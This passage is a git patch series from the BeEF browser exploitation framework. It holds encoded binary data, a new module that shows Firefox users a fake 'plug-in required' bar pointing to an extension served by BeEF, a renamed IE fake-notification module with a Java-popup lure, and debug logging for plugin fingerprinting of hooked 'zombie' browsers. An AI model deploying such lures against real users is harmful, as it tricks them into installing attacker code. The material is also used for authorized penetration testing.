zU|XnrOf;0c0i!ka9<z?#?u(CEoIh>@h`b`q!&qbNUZ@pDI3k6Ec}yphPy|4+zm>mo
zthYJQA2)LSZ*JX_99zjWjK7R6V)x6t2lI$9QPCe%U7r^g1q$(#irS&R+?4~8t9U6J
zfFlyg^2(Bb^2Clmqa9KJHPvmbn9e{wtD%!TWvBCjO`7O$;igoUC^}G0if52)jd4O!
z1O7BAeYYXzLfu+o6IC)3F!0p*yrIqT?YbhuM&d4rYJ&V58>(KmqEHL2C_RzBVnbbY
z6<?|}NwBRVF=YJmfZ$ZF0IjLG)VPQu3&f@$N6X492YQmYU?kk;r;AchH8}`cFr74S
zc3!eLNLa3M!{@>tk~B#=HaAz-{S_Fu;+8A{3VF#$hlE`P(AsbucZ!mBaf2@`3`pdB
z@xj+IY>D6Uc{&vVVs*G#lOe-K&u7-;Er<gUKn#_hFD9fof;qX}v{o*B1y$Wa_VN0!
z38Snd^>VZy5IIUdNy%|4@dMLCA>FIL?aavgp3U*)#<}bad_i$8c<95AtrczZ{mmm$
zwxO}vyN|C|0}(HIKel1SRImF~%ei-!ct$z0Vw{?}N<`NSl8;hzZ7K8iK~KnQN7{MR
z<JMmFHEuvYSE&Z}5ZB_QiMOz<nJO9=gV5Z_pe-NbOfHk2`6<ssy0S6)19%>#v*PF4
z9G?nEllld7xu$R<YaaVH*&U@bPz0m^fkDnMhE`SxEX_8sWR!A>wR!kv;6MMq&>0uT
z#TnA6W)jEnGWg{CFA}rl*Bg&kRqu@9%JO!h*!FNjtCUj7SJe8R817+3nC7&D&d_zk
z+I}-2yjlstOQa~iH{@k|Aa1+a5b1dDi86+QPa5&1=Qq2jb-sX7AMEI8G=Sv)T@D>*
zMzPOtG}*m6^-1&il;(D{oUOaEkWWbrf3TtJd`R86IdhD>nOm46UrPzz1htCd7|Sup
z+<85xPAf_&jM~vm(DS@97vkD^HH2x1QTAipgVz%-j*O-v@cApcY|pj*+Q_!A`m3<a
z66O2;5Z}zi7v1GkF5pylC)T$vc7~4ytFHvS!YSjWth@kYv5B%G6A_B5KQ!yAw<FyY
z1hesT;+qvd<FA5JR&ZNB=25;1IY%Mx{dIO=s%{%%q%BMVrlC>CoAd?!_p-X$-7&ei
zf-Fhn3a%`l4|<O89@J!G%}@?Ah2-z!yloqVk$siUw+|UL=ILOBgFH&FurdOipvHG3
z?2cgl)A`p{+6HJ%6)fVXZOz;9ecYQD!vi7?7r5fZhrvXK?Dq$659t(cR&Y?#;|#1Q
zO?r5?-$=b58%MkKkTs(m@&1AvFw~k2VFz}&yxMpniMWjN++gSwNY>*)E84ER&YxZ#
zpy>D^m3P4@=sQ=WKU3HC=CEw~=U1)=xB8%>{reY@TsIqg<-X>zi+oeV6zAg)3@|t`
zYk9~fbA#Q!iEQ!KbwTmdYXB#M;ZPXLX;Z7I7Ezj41rJts(qlnbn38*J-o!d?`lu<J
zTm+yg&8w~5aE`ezUES5SbZtoJZKO|%8O8d%#o;VR)LFqj-3@Xxc`MExyX8ZFcDH`n
zpU{+x;j?U;i_Obhp~s}=8hPrp6EG>ihLPoSH-#jL9}cS;VEL;CHNVayrp;xJFhebX
z43t7sgwD%b0K-*-9CW%t7n0kg4e96NGCB9=$ZUoi*f0$$3efIm)!o8hyq>J+V=l}2
z#e8vDYo$Zpt^epzjJ&?~Xd^c!ip6QrOd9rbaHILY!q>mOGcR6Ei`k09d^OSI=@<_0
zr-zaf&lVt_BHFlR-CLjXUH1!ifqCUwGrLP~r^aOLvUh${k0d_&d^Pd8!~rUB)DCJ;
z<=u|bgJ1j(RWBz+2I^jSaWF%~Y>@(07ul)Z?Z8+hOlH&74K}mbJL`;yzPze&Bg%s>
zaZ*Zkbz-YbkhyDeab5RBV;xui^lzdfpFM+5Ct?ZJnHm#2aK7u~;)k;7w#)OeZFh|T
zHe6H-8haqQR*VeidwHM79ao4q7wcxsl`&R3n*sMgjUcS>t<MWDdj(L9N6(2vZ?y`!
zyL9Bot+%e?9^Eu$PBZIG`*ZLtN8hf{dzp}|BbCJ@)d6ld%9PFzm>l0XOf4oJq}WYn
z%rEq#y|qx2x%ED{M9i(wo}Ldv9gicT&A(E6s;n~W@6anLaxMDZ5BD9Y*1Ok~hEl@P
zxsk`Yo)ETO9%LUl^L4)}jrD350C#6H1nI6fh1b4x<BjO@#yFA3x?W(l-FGN9x%)!z
zkj=cYDhnf@ies{LklG>F2-Ya;g~2f?po+Gg04ZG`n4U~MSsATgzt&8fud#f9-N?FE
zYGJRmwn&k!;jN!5GoWx6OBO6Rt;cw~>YP4VyHQKAHt43C@4LdAKTN|Ht%K{b`Os(h
z*b#kw>@W#pnEK`loAbIboDh^waQ0*0uhS!jkY)OeEGeGmvWsNdnAwVGnto7Rj6D94
z9ROa(4g}ckKAd8fonX$5@VL%bnSH#*o3}EI<4s9&Z92|4b-wWbWL~=b$o8}h#@kj3
z`ncUYb=x&zOiMYQcMN1U?+K>}7zsYudoSJdx7?IZ-hyy<<#NEeuzMC#yj|VrXr-7W
zxHl2&o!P;4-C{vf46M=<Fdo?tJ-E36mh2^qOp8lf{49QudPJCC3}mKfi2(g-z1}u=
zdkr^ZCR5H&H&xkhL4(+71Bry(B*=+EVe&r$j0#yc23-Qg>yi4=txA`SvkFa`-s<XE
zk6+AB;7vuLrW1gX_l&k+ys5+}!oOXR?y$`Yi_4K7lO!$6yRbiCDEWBSgaijiM&RkV
z-^n(;?wwm7Q*h0O4;^ls^A?Ej<%neh`4^HMiWZD!!c17H(9ePeAB{s}k-;Is>qyxw
ziY=i5JNkzfv)k+b160d<!_d3~z*Mq1ypm8aNEt_R5t!T)IQV>QDz3>e407hL`PryR
z7ij4mVMpOFi?iLRa@1+4Z9NEE=9|dvKSDbaLSO-!5{|_L4#T`iN*p&9kR#$i;W}#(
z#E_<Vt48<@D??jEco|$7(j_y?J;4_@8XE&Hp!+q%Svle<Zk6n))AaUQ?CuFY1ShO>
zTCb%8VdpAcFh3PSA&b}%E_vM9EnXWsX%y4LT>ltGA~wI!iO`=a2r1yp57!&VZ{4SY
zzZbms&kR<4=D%0vi1n6NLMlocPulz5E;sE49&N<k&ZVfeM<i%faVJkg9*6pdPzAPs
z(-#}%vvVLrqb1xd9^~%Di1m!LNMd9~ml084`Wd!DE6*iS%r4sWW7Am-nctV$X8KLt
zFtB@OA=p8PK??XqxPY!IDTO*;R}XJp9OUkBN>qbeXIh@e)jAEVVrSqsu;a3^MIpOz
z(_NX~C_fN>EAdPgcJ0~_jdDfpO?o1O|Cq{SIh5OGU8h{h)W0wiOM|y=u^*HcV6ijN
zf?mG{#AF&4yB()DzZd{zidS8U!e!M^`gvOC8oW|(zhLs4!ZD2p)=LD@!9_k^W|CXe
z?~m&-7Au^}^H`tzw(e!>EoFaEI+*92U&dwzg|mh6$&ipuAql^yAi8;o@Q$0&T4jyt
z2}`O*MHWYMETqptaB`2LMK8g1>1HrZfr4*c>h(_zPH*EM7-;ER_q%2!&y6E{<7<yf
zQVqv{hTiM~Rd-`XSa<UVA!tiJ4)nU1{YQ;5Ac&?0LYPB2LyA#BcoUBZ39!W-)l57}
z@V-Yu3~V42MVp<Q@?6Zg1HJ6<Tj#54a{Hm3)oENXS%|+PuWvo|dHI^r@d>W#fb>IQ
z=_pY8?r<gk8Pg`r^AXO28n@y7&0kAypRdtsj;-0B_$^Ss7>kUX26(0yP>Mny+lL_g
z3Y(Ew1UbA6$U+3d(utC43yvyJFYabEW?W(r%+U9X*@_*V7=<(&5h8N>c%bO-qKCO_
z9X<|Tr_@r(LANTV(=$Qk^<i9CFQBiiVs%ULw4=bZRF^_(bziaJfiHNG=Jk2#H~D;n
zr<k77Inqp0Du!0qQReZRiLYh}jkn;)FS4oL(H#U@{wv*d`5d)8EMdpX?x)8n>6DE0
zfk1yE9HW?^Z*RdsRPlQ;M=8aOrBU;Y`OsN&bp4bTC|T-_@T@ah>`a)<OuG`8^MI&?
zmhAOD61BG%UAqnM+C5x?eo97JPH&!mH&|yF;GTEcRi7)Dsp_EUTYo~yrAm$sw$Q>p
zZAK}AZDy|)+++z+Y%lhmtHHW7y1_ZUE<1b#Jrh*VzE=~v^w|4`z1@=Jrsp%-rpq&9
z6}KA5VLB`J`oZ75kQ;vFjCIGVauMq)OEKG>wo5MEOvKMumIJ~gjQ>1te4pW+<Q=Zf
z8*khk9eHfN^iQ=a(^DP$?4KS__u_2!;H<|h)rhb|N~yeghcx~AyqA#>b0u$Gnp2{q
z9t3wmxH7V^7OAA*I`JS+;}jyBzu+rGfWD`^c@5>dowU4tArcv<G8#3bj|SHU_cAk~
zh1joab`};c1E*<-dg$YzPU9cyV)iH?`w5M-uZvqDFLf{4H-DWvJTbnG*5_YzkUpGa
zl9P>=<K6<A1|aN9y(Sn;No2%^h1g2xQFJR^(r_emsacI6)7gsgwW2J9kH^W-_r{hu
z$DMv)a^hVGjxYH`qQ%Nwy+T=JMw3d^vxLS_&-!+sgaAuA@9IsjOLtnpSPZa92O_LY
zz(5u(oXN>L&RlHb45Kjw(@Y6=bex{`=f(5zG%@kar1M8O?bdw+f4{rm)a+yg{^8w@
zJj})GEpI~OS*4{_lIL7qFj?rGggu3bVW3=vi3FxchWhZO^CAh-(Q0-7uGCAHVeVll
ztyN@ckTkNpZ4%xNcj&tRMyU{5&qp<`FbdP{0=`cf)H~kaznn%}qEMsMStW`tfQN7I
z&Cf!qANz^Mb?bX`LK;2Xqjh7g)0R<(qTu`<Lg+@eKkBD$)+0o(E{JtTc#zE(E}aI8
zdFq)pQHE~uZbOzpN~{aK-0ZZX{m6otsntKs3B)kh^3FtbHaiiTHxM9Qc3{U0EVK|W
zEL>OS?KPrg@dBO{#t8d+<;Akb?7gH}uTIRQ)Y^&`b$|37qtOFP$`2ey7I$_6Sb*P1
z%N$}iPp;{4^MjUVQ6bH-jZ^c}fR!y@+!ib5MLI8?EK}rajqsQnUZl)?;9U)Y*<-(d
z<NClg7kkUGWO-;bdNHQY6_K0eqa40vs&*(gG-47C<OJ&?(WIvPO5Tz43paj?LhG&C
zTw9%N4UQS|LOr6kXi8lpeoCluIeRLX85GCrGg3@&{%7C|+%@aVf@bW&fEY=fgyII>
zZ=5n8{V&*ix!e|k01X^i+;N~=5{+61H-U4a%^<Bo%V{$E>RI9ODg99fHg>M`$dTd{
z4EiJ?bT`|gWmMQ2)9qsg8NGaZ^dVJDftoQCSGC?Uy&P~wNS4i8Wh@%|eCeUz@d*$2
zi3`ADiEB#jaYr!t%^q}Xhz@z>o+oXyEtsL1^9JsMD0P1lq%RNlXs%Ufb_*0ux-Y#A
zAX$DTUlr(tUKf{0E^On{(RjT`Z)<u@^rWBp7Ibu5<<`HLH|2AOvi<JE3fHyjU$<H}
zL}=NW3`(Fsg9*I^?rL1HHkuR-NokV|oWK3j3LR%;Y#E89O4*(2;IX$G60MpzFy}Oo
z-R<MB;yXF^nH_yndtUf(TeHF5`HjcH*6qtVOdo_(t)F|2w|)%u%ukXrHz+LA`>n~v
z?4!%g1lS%peh_)OYTRHQtU_c|4!n0=ZOzs{LlC;aWkLtmdP6@$F79>t`a~)^2fowa
z(^ofq{oK}0k33JM9k`;oHXLL55phBh-uFsggsU<G2$`-!dVhP%yFd-dym8HVVUt{9
zCPITi419%7=gXJwets;7L^D8Ku%wVrw)dSy6C?7)Dy%baRXO<)g`4Y!rs?Vx;mx((
z+sGD_h=Q{n()aA&#m_egCeIKyA@T*>{v#jVcf%v?)q{OW^rf9eqPl~361uQj|MHUE
zar@YVIg2xPMNNY^k`-XD>4^9P+$k;xQ(<;;vp=g37P4JD)W%;Q<%s|e%=ofNp@D^9
z77XyjsK|vI6^$F}OJm9d#Nn-_F36nnJD+T8da%=&#_mfrygA~-B2rKfv1K)y^A@g~
z1n>f9N(81k-z9)s@B7wn`tf89KEHcYy!I{#M428W>kcaw<79Kf=~i2ifk@D?5B{7X
zxf6jq*)rD%rIparX7g@mK8Jv}IsQ^44ZBl43(G)?M6lhVG=x;9+6)cOII*EX_+KIU
z0yZ#23l^r90_$-;YY27@-Ha6Q-8Zoy5r2@qb()UID^r+~iXmB44Q~f?ZH7pYX@%|L
zdUC?ibAC$(zIzlq(N~2QOEAr-6S*7&`z|5|i>JQsNo2To-CfAM&G6}@h1QXx6}b!L
zA*C4PNrxm$Sf?eJ_<hag&|g~({Bxv~nHL8wZDZV<uoH!=5-vKRJ*6BP3<(HC4{mOw
zwt6}sFV~KXP<@lmi1)LdhWOKq8-|XH)xx1UENk}@@v;kG_x^Gk$A0)pYA6f%RmpuK
zdod~ONFA6ri)>B56~@{~P^=LO;?1Rbvyj8hEQvsgDHL=6%}j>hKg`{ts~oGGYtnbz
zehZV|?oJ+yn5Eqw7pFGBjQHZBoU^?H=>wW}MbuZ~{OY7p>?>!1);)oDaWEumY!o@&
z=ao10rt)V=A6iD>kkzNvI-jpf38xFw^kpXfBa3TJQE0aF92;qAVpRt+X85=uN+S&0
zXD7`G$DKy|#Ja2>8Cr_y6jeHgdiScPFF(kkBvtSH$ZAo6#hBdJjuxgwZeaZa7#Zw8
zrS|?yW;dw&53AnwHX}KhfxV+Re2W!rK+q1`PvAgoTNc&vD?>q2cly&B4=J-}VXV$&
zityWQy){C+otrm~hiUYPFxs7|kCvDHxwNBIskVC|{SMsxje5ex<Y-P`-cQ6zCMB4R
zAJONeX#zw{bE)~G+%Zc|!)L~MF^E*MeMV2hQ9yECI-?Use?fYP*xR7+CZx)fk(Dhr
zy@Df*=(VSzsEjeYOVlJKdvu=rg{^Q!iM3Jr*8P@_f?b=%K%Hxe*5zur^X>^j@QrmP
zMVW9dV4+d_zyks}TiDH-qyLU36V5p^@NX?gz(KZTi+YSVAHx~i$d`1NG*fWN%4<Lm
z2^)uZ##DNlBJOhh*GPzo$wFsb#~IA00HXQRS6aA7O>_P&9^OX$xsGm#7>W;HCD8I)
zB$pl3QQyaE5+7CH;RR>0C(%V!9(}vtTPV{NtkNM0RRTB)DgPPg4705Z&X<HYop$9P
zl^hz^&y%OR6uzaK9kev1h+@s+5c^V$F`0<&4eopzGMH*QwM8`iJJl6$=O~@nLxuWC
zOktO~lLtI(^fv)<A;m*8?2cC)*mLFqxu5);>MS-9>J`03Wp628GS1me!J20s7@t>m
zAm;vpHz%xaG2jU#@rGUcbjGwUNAL<6;YnV>e=x~|v&D3OE%lj5)#sLH|Kf+B9TpFI
z(YION0*oN?6|_aoioo7rdQamH&aXg*%f5OOvdx<g^#}a(JVF68f+@F5&DmjoE>5UH
zM(4vv+ACJMBr=1?98RIv0cmo?M>s>qPM<(gnIRBz&F9j*n1aKLL|FD>yJ7B6XBuz_
z(DR1o<{~B^UJcFlIL9}L7}6CXOAD~?deAbSv@mMMaqno67kgW%j8kd8#gV>loHwop
zL?|ewTK$EU;@~Phpw7pJY!kv*zh$H<VSPL1PInuaC1cQldl_{gMVbC~B;WsjF-G|L
zPoucJ#J`V(Ei8=T!;_{Ne4kM#-Qry+Ci-luA|kg(yUoIhjF=^skBN}m7}D2;NaE4V
z>uH6dgZm-Of&Grpx2q_W)x>NT+ANK9w2W8XDzA0^E5VaMu$;SrP?0jE=ktpPNzG0h
zBx_Dgm7oySGuuCepy-F_{K#96GNyqP>gnk!p)_)7ZGD#0j~SPP7#rr>ss(x*VdPUe
zzLt%&Wrj?o<%Cc`0eWaEx7rK<=Q8zecRz~4-vUkokSEz&{S$cJ2)UQ1@6`0;>#$V0
zpsxA7;mMi|>e0cesXxu`t&@YP7mFqj>?7-OrJ-#W`pV0(*Jw>DavK}(LHDhvCjIyQ
zCC?jql8OqmZKTW3{IbA$70H<TV1E(_35IYCNv=|PmNRLwhd$6&wKb0S#JLkb*ykxn
zK1aTk@Gg8SPHcObOFxNequGlt29_ijYA5olvNM5~Dh54ikO3iBr=V2SCmZglT32Nf
zD=%`bE-i*!qT7)u_y9{|Or39P)Xa&g+lOWXIVOemPI6P>DOj<`SgxC~5atVcsDoxm
zmpVik!Jh-e%*%gzNr>_KY>uKRO(G_%#p>%P!Tv<M@+TGm4+=g}u#aLb3#D(ijy>xw
z6glr`NN)NZ6(3yrMl*h$INlEY5N-OguBEdSISQF*ZwLeK=H)9V8#Fi^+}pQ>cwhQX
zPcO!`KD9+}iXej*$}{!)I_jd=n<UKnW=rnpG|!@TFWky|mX-AEed09$m>mQ~Cr{@6
z+M})7+z#Q89qv~?_haY$OV`T#qZrrKU}%^bPagWfg$`gvVnFX7lV!@cWgUfQbm+g9
zv^r{LS@NVen*rh?8b&-;7BbgFXCfWM6wBMyOtzp&MDm5b{Z5HWp}@s`d!i-Wh8%o=
z&TJWtaE(81f7`?mV2Lu}oVYh3i@g6%Qz~zD<-bw-*2mWmEpR64b+@Mf!9TOeq0dUb
z)OHa6DuB&2f@Q6VR_EnS(Rmz7GP{nNc+3<hqe;bS)x|)yiHVQs^zn>Tl1O=+6Al=j
zA&6Wa;JO{lU>+n}B8>C@LHfQ<=#jy9w>)ydWRReb5lvRQ(NFc$Z@Oc^#<cKleOe{(
zAT!3mwu6bF%M`8#S$Y5S(6c_qn)Wd*D%lq>Q5HDRPYOsZ&m};5tcU3A-~?piYTvA!
zXX*XL2%->RH7k~=G`9O`(6#uo*H!&u;0T4&Z*uVI2|hce2L#v!+v+fGYo`Wtuh^?S
z-wAuaY9r(jIo^y+Vgsdblno9`-|Kh<0?um?{ZXe>v7~Q{s+%eBqT4Wy3Eci7&p|QG
zGa-MnC^Fs<-EJrT8YvjL?tOF`&SvGqZ1^kWmKxLh{#(j^BGGj(MorTK|IG|;RYrzj
z3R2?OrD-(J-f1LA&ok}eaW+;?YB<W0iWDsI;;in&8xFgLu`JRN<to2zulMm+6Et%{
ztvWmD`tshTE3*CqYl%JVFmRvyq?KBzaT&95#G{`r<8XCxzq*gPrms~sw*-BPvn1Tv
z)JX;dT+6B7+ksv1GK>RU^snohexH(UR4x;SiF(KFmny|-ClB<KqluwF9AKTIo)JE>
zU(L1es1aVI`7<mNA51nQ<bjlIw~_>H&<?oqw5Q@FwX@U`&bI&kIqgUuLHY^eRX}2&
zsLQ3}WsN*BEhvM%vZI*vH(t%Q)+X59jd>VOrGdJq4l|9D41!>Q?)CnWf2N+~g;Rc<
zXCQDg3-2qjU{{u=E5NdQU=>nvxLv5VW8{|uf}nQt%f)qOoe5VhL0SU}aO;%UAiV_x
zi)4Tm;%el1e+%)o3??&pYDUB!-l^{=9mV$1$EH^S^z$|VtT>pfCj5TnBC|mLk9&tt
z?glM#uh508?~U4I9)<B{6aQbUo#>gBVxs)ANJ|quK^i0RX+?vNC_=mUj=!b(^?|6G
z=1<azxB?wZGeVy?Z`W~Z6k_(lNDHQ|LTeKsV)b7?jvQpm5_?&>@d&hEU(8;SSDV<7
z7chIG-pSPZS4Yt2h4>E64HYKaOh7-{(QfCCJL+o}0kT^_Fv}|$hA14WDvB9~1O65B
zl$E?^HUuY3X*@&?jy--EQ$1W<9rs4>EzFBOz|G(L#o3VgzshrCU3l0)^Z*p7NBh*I
z-2n_P`QqDw2M%Ua0<4hqL<5H5PJ&$DcEC=q)eyTcF0<y#UcTiCviGtwC?_H$5%bh@
zctmh*b;RYV;OHQ>n}%g;NJf6s{gB!W?_cFvGUHBkl08<UG}jW!QTEIrQ9_k8c5q|3
zIcjGM4w+!c4Vl~jeh6=6hIljkHCsdUi9Sqd5}4mRrb0mhb8bK#fSq$-;uH##_pL7H
z3d{S-3jZFHG~n~)#m%!L0YuaieFmlS#4Q>w)pJ#0GudPT{}Wvd`1N_Vj@>jFYXjor
z6ds<xF%+&{zS{W*qRlBbje8r5c5%1anS2kp534%wsg2fdEQgIV*0m7y)xU(mh=qOt
zMgg8ut)A;|_=_ja_gNaM3>WaFF6awk>B|>1yWdm%8_6}J_Flt8LvRehumDvrzr5N*
ziOPrnlL><pRLa&V7#2Xd(v4ZQqY}aUNAHc``Jm%kp`J|J|Fy9zuimMj8LDA{{;aWo
zED}_~tYB2U4{mrhZP$?ZV(SNfG-KK<H0``d+zTb(F;fz%oqF<cd#8`9aOH}!pI7v`
zb3!vlrxs-}US;{|sh~;$4mxA{eQxo7p7;hix)Kl^(ml8|?m%8k0ZU1gmP|9HIP;8M
zuGtOv0s6g<z>&Tb$P+4g>dH@>=voqNNB?D~NuEvt+x^0u3H=8i?*iW~*$;5lu>`$M
zQkEu_>1I&jh&sC61Z&GCVmJYB=*z<0P=!GK+JYxb+X2tCS^H7E)YI;7iZR>j3w<T?
z)L-u_(={*hJ(8>%pBB~wR6d9-hR5Fibl7jDs=vLqjKlDx+U_2i*&X@GtBMZ>$>p-!
z3`Te1c6qlP)XoizrRIwk`*Nnkbkki^PZ-}-AlgejdA@i926jl!1wZR}qZ7qa4|pd+
zRBzO}{jFAee8N$h?1sPI?k7*_*;CZf0c}puFB=fmp}NOap}?g1hp)KNjqy`j4g~s)
zf6!eI`KsREE5iBp+6}tpNGXoU+zcRyE_~AfNu2Lju#9(;a6Fx!;E1jO_d(@TQ60NR
zOOlEFQcV<I54>zgq!ww|_q0TjCS8MCUOqfv9DJWa&lw|n2MMbal+?GG*Eh>P;k>nN
z(-^T{UR;=viF4gm^Iu)*8A!tieTq5kA0C@MfA+rv*C`VdZiX2UdA-dER+dh%TSKa-
zslWG8#<ffIrglsQG{Y*0cvXLa1$XS<dc>2pP<K7B#MkSi>ujx;jSQ%r`h}`)Msp3|
zl{a@a$WmTABftWY*;c*@p=vZ^V!ys<1AuQ-SLyT~P&L);&_JIiBtXC+&vh=Y;{sUc
zOOl;TuPqe_6<w_nLNcjvNCd)Wa(1zSIWd?j9hf&lg3@G%+tBeJp}dD#d#}1$K-2W!
zgAgpftjH6ljOqACkJhz2oz}Tru0nGjKx-}ScyDwGKSTAu<jFTC7!)ENfSu^B?&X6L
zVtk^q%-<4|#jXcVgrV_&I7#$Ba0;C;)YTb*VZG~rP1qg^u=4aJ7}#hGKr5A>1IP8S
z;&aPC97>hWpqMcK|Fo+G5w$2oB?9$33-B)hk{Zo#qYsV;Xr<_l6-XDo?Dk$;(s2d^
zdn!vwPU!1b@W*}o#&Db|LpQAw{g-$7c7TXdA_jlf<qa~p|1UQ5Ws4f;eAoZJkNNWQ
zc8@ksg-dw&-D3K^z24y-8=y2FfUSc?to4_Y_upQL!H$Le5H?K<{uv7HznML7pnz)#
zD~r>=*}Ng10z;+`Fly@QeH#mVSOcQ5-NFo^|1Q!$K#jcZz%ennD@#n(D%ro>(f=3v
eS0ed;BV!zPiZ>VD#s7n1fk=q_7OoN03;2KKGp>pN

literal 0
HcmV?d00001

diff --git a/modules/social_engineering/fake_notification_ff/module.rb b/modules/social_engineering/fake_notification_ff/module.rb
new file mode 100644
index 000000000..fba9d4154
--- /dev/null
+++ b/modules/social_engineering/fake_notification_ff/module.rb
@@ -0,0 +1,32 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Fake_notification_ff < BeEF::Core::Command
+
+  def self.options
+    @configuration = BeEF::Core::Configuration.instance
+    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    url = 'http://' + beef_host + ':' + @configuration.get("beef.http.port") +'/api/ipec/ff_extension'
+    return [
+      {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url, 'width'=>'150px'},
+      { 'name' => 'notification_text',
+        'description' => 'Text displayed in the notification bar',
+        'ui_label' => 'Notification text',
+        'value' => "An additional plug-in is required to display some elements on this page."
+      }
+    ]
+  end
+  
+  #
+  # This method is being called when a zombie sends some
+  # data back to the framework.
+  #
+  def post_execute
+    content = {}
+    content['result'] = @datastore['result']
+    save content
+  end
+  
+end
diff --git a/modules/social_engineering/fake_notification/command.js b/modules/social_engineering/fake_notification_ie/command.js
similarity index 100%
rename from modules/social_engineering/fake_notification/command.js
rename to modules/social_engineering/fake_notification_ie/command.js
diff --git a/modules/social_engineering/fake_notification/config.yaml b/modules/social_engineering/fake_notification_ie/config.yaml
similarity index 64%
rename from modules/social_engineering/fake_notification/config.yaml
rename to modules/social_engineering/fake_notification_ie/config.yaml
index fb4ccf970..25604d287 100644
--- a/modules/social_engineering/fake_notification/config.yaml
+++ b/modules/social_engineering/fake_notification_ie/config.yaml
@@ -5,11 +5,11 @@
 #
 beef:
     module:
-        fake_notification:
+        fake_notification_ie:
             enable: true
             category: "Social Engineering"
-            name: "Fake Notification"
-            description: "Displays a fake notification at the top of the screen, similar to those presented in IE."
+            name: "Fake Notification Bar (IE)"
+            description: "Displays a fake notification bar at the top of the screen, similar to those presented in IE."
             authors: ["xntrik"]
             target:
                 user_notify: ['ALL']
diff --git a/modules/social_engineering/fake_notification/module.rb b/modules/social_engineering/fake_notification_ie/module.rb
similarity index 86%
rename from modules/social_engineering/fake_notification/module.rb
rename to modules/social_engineering/fake_notification_ie/module.rb
index c169f99a5..ff55ea7d5 100644
--- a/modules/social_engineering/fake_notification/module.rb
+++ b/modules/social_engineering/fake_notification_ie/module.rb
@@ -3,13 +3,13 @@
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
-class Fake_notification < BeEF::Core::Command
+class Fake_notification_ie < BeEF::Core::Command
 
   def self.options
     return [
       { 'name' => 'notification_text',
         'description' => 'Text displayed in the notification bar',
-        'ui_label' => 'Text displayed in the notification bar',
+        'ui_label' => 'Notification text',
         'value' => "This website wants to run the following applet: \\'Java\\' from \\'Microsoft Inc\\'. To continue using this website you must accept the following security popup"
       }
     ]

From 32b48e51720dde693fdf9056793313cd6e8b3f6d Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 4 Jul 2013 23:50:34 +0930
Subject: [PATCH 347/397] Add some client-side debugging to browser.js

Perform minor code formatting changes
---
 core/main/client/browser.js | 53 ++++++++++++++++++++-----------------
 1 file changed, 28 insertions(+), 25 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 7e100f0d5..9b3e8fd9a 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -1098,7 +1098,7 @@ beef.browser = {
                 beef.debug("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
             } catch (e) {
                 // warn on cross-domain
-                beef.debug("Hooking frame failed");
+                beef.debug("Hooking child frame failed: "+e.message);
             }
         }
     },
@@ -1113,7 +1113,7 @@ beef.browser = {
         if (!this.type().IE) {
             return (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"]);
         } else {
-            flash_versions = 11;
+            flash_versions = 12;
             flash_installed = false;
 
             if (window.ActiveXObject) {
@@ -1125,10 +1125,10 @@ beef.browser = {
                         }
                     }
                     catch (e) {
+                        beef.debug("Creating Flash ActiveX object failed: "+e.message);
                     }
                 }
             }
-            ;
             return flash_installed;
         }
     },
@@ -1154,7 +1154,7 @@ beef.browser = {
 
             }
 
-            // Internet Explorer
+        // Internet Explorer
         } else {
 
             try {
@@ -1162,6 +1162,7 @@ beef.browser = {
                 var qt_test = new ActiveXObject('QuickTime.QuickTime');
 
             } catch (e) {
+                beef.debug("Creating QuickTime ActiveX object failed: "+e.message);
             }
 
             if (qt_test) {
@@ -1174,7 +1175,7 @@ beef.browser = {
 
     },
 
-	/**
+    /**
      * Checks if the zombie has the RealPlayer plugin installed.
      * @return: {Boolean} true or false.
      *
@@ -1195,30 +1196,30 @@ beef.browser = {
 
             }
 
-            // Internet Explorer
+        // Internet Explorer
         } else {
 
-			var definedControls = [
-			    'RealPlayer',
-				'rmocx.RealPlayer G2 Control',
-			    'rmocx.RealPlayer G2 Control.1',
-			    'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)',
-			    'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'
-				];
+            var definedControls = [
+              'RealPlayer',
+              'rmocx.RealPlayer G2 Control',
+              'rmocx.RealPlayer G2 Control.1',
+              'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)',
+              'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'
+            ];
 
-			for (var i = 0; i < definedControls.length; i++) {
+            for (var i = 0; i < definedControls.length; i++) {
 
             	try {
-
-                	var rp_test = new ActiveXObject(definedControls[i]);
-
+                    var rp_test = new ActiveXObject(definedControls[i]);
             	} catch (e) {
+                    beef.debug("Creating RealPlayer ActiveX object failed: "+e.message);
             	}
 
-            	if ( rp_test ) {
-                	realplayer = true;
-            	}
-			}
+                if ( rp_test ) {
+                    realplayer = true;
+            	
+                }
+            }
         }
 
         return realplayer;
@@ -1254,6 +1255,7 @@ beef.browser = {
 	            var wmp_test = new ActiveXObject('WMPlayer.OCX');
 
 	        } catch (e) {
+                    beef.debug("Creating WMP ActiveX object failed: "+e.message);
 	        }
 
 	        if (wmp_test) {
@@ -1282,10 +1284,11 @@ beef.browser = {
             try {
                 control = new ActiveXObject("VideoLAN.VLCPlugin.2");
                 vlc = true ;
-                } catch(e) {
-                }
-        };
-        return vlc ;
+            } catch(e) {
+                    beef.debug("Creating VLC ActiveX object failed: "+e.message);
+            }
+        }
+        return vlc;
     },
 
     /**

From e88c3c1f862ab9a3f25f8706f5452d2a9f8c1e1f Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 5 Jul 2013 01:17:20 +0930
Subject: [PATCH 348/397] Add fake_notification_c module

Part of issue #695
---
 .../fake_notification_c/command.js            |  35 ++++++++++++++++++
 .../fake_notification_c/config.yaml           |  15 ++++++++
 .../fake_notification_c/img/filler.png        | Bin 0 -> 564 bytes
 .../fake_notification_c/img/plugins-left.png  | Bin 0 -> 1775 bytes
 .../fake_notification_c/img/plugins-right.png | Bin 0 -> 9546 bytes
 .../fake_notification_c/img/plugins.png       | Bin 0 -> 35015 bytes
